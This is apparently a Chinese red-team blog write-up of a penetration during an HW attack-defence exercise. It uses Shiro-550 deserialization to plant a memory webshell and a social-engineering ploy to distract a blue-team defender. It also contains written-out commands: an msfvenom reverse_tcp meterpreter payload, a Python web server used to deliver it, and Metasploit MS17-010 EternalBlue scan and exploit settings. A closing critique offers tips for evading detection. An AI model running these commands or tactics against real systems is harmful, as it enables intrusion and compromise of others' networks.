实战渗透1过程回顾

1.前言

近期HW行动的高潮已经到了中旬，蓝队24x7的防护，阿布面对众多waf跟蓝队的防守也是头疼，蓝队哥哥IP封的速度太快了，信息收集死了6个代理池，发现告警立马封禁，但是俗话说的好，不怕贼偷只怕贼惦记，阿布费尽心思潜入各大甲方群，偷偷观察防守人员的动态信息，终于找到了一名防守的信息，这里不能截图害怕信息泄露，通过聊天得知，晚上只有一个人值守，4个人轮班倒，晚上客户都回去下班睡觉了，小阿布稍微勾引便找了个兄弟协同蓝队兄弟打上了lol，还找了陪玩妹妹！这个妹妹声音那简直就用两个字来形容摄人心魄！

老祖宗留下来了三十六计之一美人计，自古成功率最高，多少英雄豪杰死在温柔乡哎。

成功支走了蓝队防守人员，阿布能有什么坏心思，只想拿点shell罢了

2.先说一说信息收集的情况

http://www.xxxx.cn/  JSP语言开发 nginx反向代理

http://one.xxxx.cn/ 身份认证平台 JSP语言开发 nginx反向代理

https://xxxx. CRM管理平台 JSP语言开发 nginx反向代理

http://xxxx.com/ 网站后台管理系统 JSP语言开发 nginx反向代理

首先网站都是基于java开发

那么这里总结一下java的漏洞

JDK漏洞 cve-2012-4681，cve-2012-1723，cve-2012-0507，cve-2013-0422
中间件漏洞：Tomcat，JBoss，Jetty，Jenkins
开发框架以及组件漏洞：Struts框架，Spring框架，Play框架，Dubbo。
安全框架：Spring secuinty，Shiro，OWASP ESAPI

3.实操

1.开局直接命中，实际上早就发现这块有东西，但是不敢轻易测试，害怕被态势感知检测出来异常流量，反手修复，所以趁着蓝队打游戏中，速战速决，现在使用Shiro安全框架的还是比较多的，话不多说上图

2.在一个登录框发现使用的是shiro安全框架

通过回显确实使用shiro安全框架

Shiro安全框架介绍：

Shiro 是 Apache 旗下的一个用于权限管理的开源框架，提供开箱即用的身份验证、授权、密码套件和会话管理等功能。该框架在 2016 年爆出了一个著名的漏洞——Shiro-550，即 RememberMe 反序列化漏洞，利用漏洞手法详细介绍

https://zhuanlan.zhihu.com/p/170393917

 3. 打开检测工具枚举key尝试碰撞出正确的key，基本操作基本操作，想必这时候蓝队已经跟妹妹打嗨的吧，哈哈

4.既然知道正确的key了那我们直接写入内存马，写入成功后访问，写入成功后，验证是否成功

root权限，往上翻一番，看看有没有子站，ls ../../

这里不放图了保护隐私，反正下属资产还挺多嘿嘿，成功拿到一台通往内网的shell

说一下当前情况，ping域名解析的是68段子开头，然后dnslog结果显示58和173段子开，这就有点纳闷了，走的反向代理，但是dnslog是公共ip，不像是出口ip，这里我判断是机房dns线路走的公共的，然后curl 访问一下自己的c2服务器，47出口防火墙，这下好了没法，不能正向进去，那就反向msf上线，准备内网扩大战果

5.生成文件

Msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f elf > /var/www/html/HYNB.elf

6.开启web服务：

python -m SimpleHTTPServer 443

7.Curl访问下载web地址，成功上线。 

8.检测永恒之蓝

use auxiliary/scanner/smb/smb_ms17_010Set 配置一下检测的ip段子Run 开始进行检测

9.进行攻击

use exploit/windows/smb/ms17_010_eternalblue (加载攻击模块)set RHOST 公网ip（被攻击机IP）set LHOST 公网ip（设置本地IP）set LPORT 自定义(设置连接端口)set payload windows/x64/meterpreter/reverse_tcp（配置回链方式）show options(查看配置相关信息)run（或者exploit,开始攻击）

被踢

在我操作meterpreter的时候，突然session close，漏洞被修复了……

结尾

本次渗透总结：资产虽然很多硬不好打，但是没有绝对的防御，毕竟攻防就是人与人之间的对抗，如果蓝队直接发现我在撕口子的时候，把我封了然后修复资产，那么可能就没这么顺利了，当然红队和渗透测试的区别就是，红队会针对目标进行战术编写，不光WEB渗透层面，还包括物联网，近源，社工钓鱼等等手法，有一个战术方案。心疼蓝队哥哥值班玩游戏还被抓到了

菜鸡点评

 根据阿布所述，他是从凌晨00点发现漏洞到凌晨5：30被踢，一共是5个半小时，其中下载马儿进去就5点多了。

1. 对于阿布发现目标web都是java开发的时候就马上总结出java的漏洞这一点非常好！这样可以省很多时间，也是非常有效果！简直就是高效！

2. 对于他怀疑可能存在漏洞的目标站点，他选择使用了网上的程序进行exploit，这点对于老手来说是不太明智的，因为网上的程序带有的别人的payload，有可能会被蓝方的检测设备加入到特征内，高明的选手会选择手工或使用自己开发的程序，当然阿布可能觉得目标太low，还不配他掏出宝物。

3. 我很纳闷为啥这么久才上msf，而且为啥是msf，msf的流量很容易被检测到，我推断就是msf的流量被检测到了，然后就封ip，补漏洞。所以下次发现能执行，不要随便上msf，开个反向代理，就开始扫内网了啊，cs配合开出来的带来，本地利用cs的portscan功能扫目标。当然阿布如果认真起来肯定是掏出的darkTools啊。

4. 总的来说阿布这次的手速不够，选择也出现失误。

本文始发于微信公众号（5号黯区）：实战渗透1过程回顾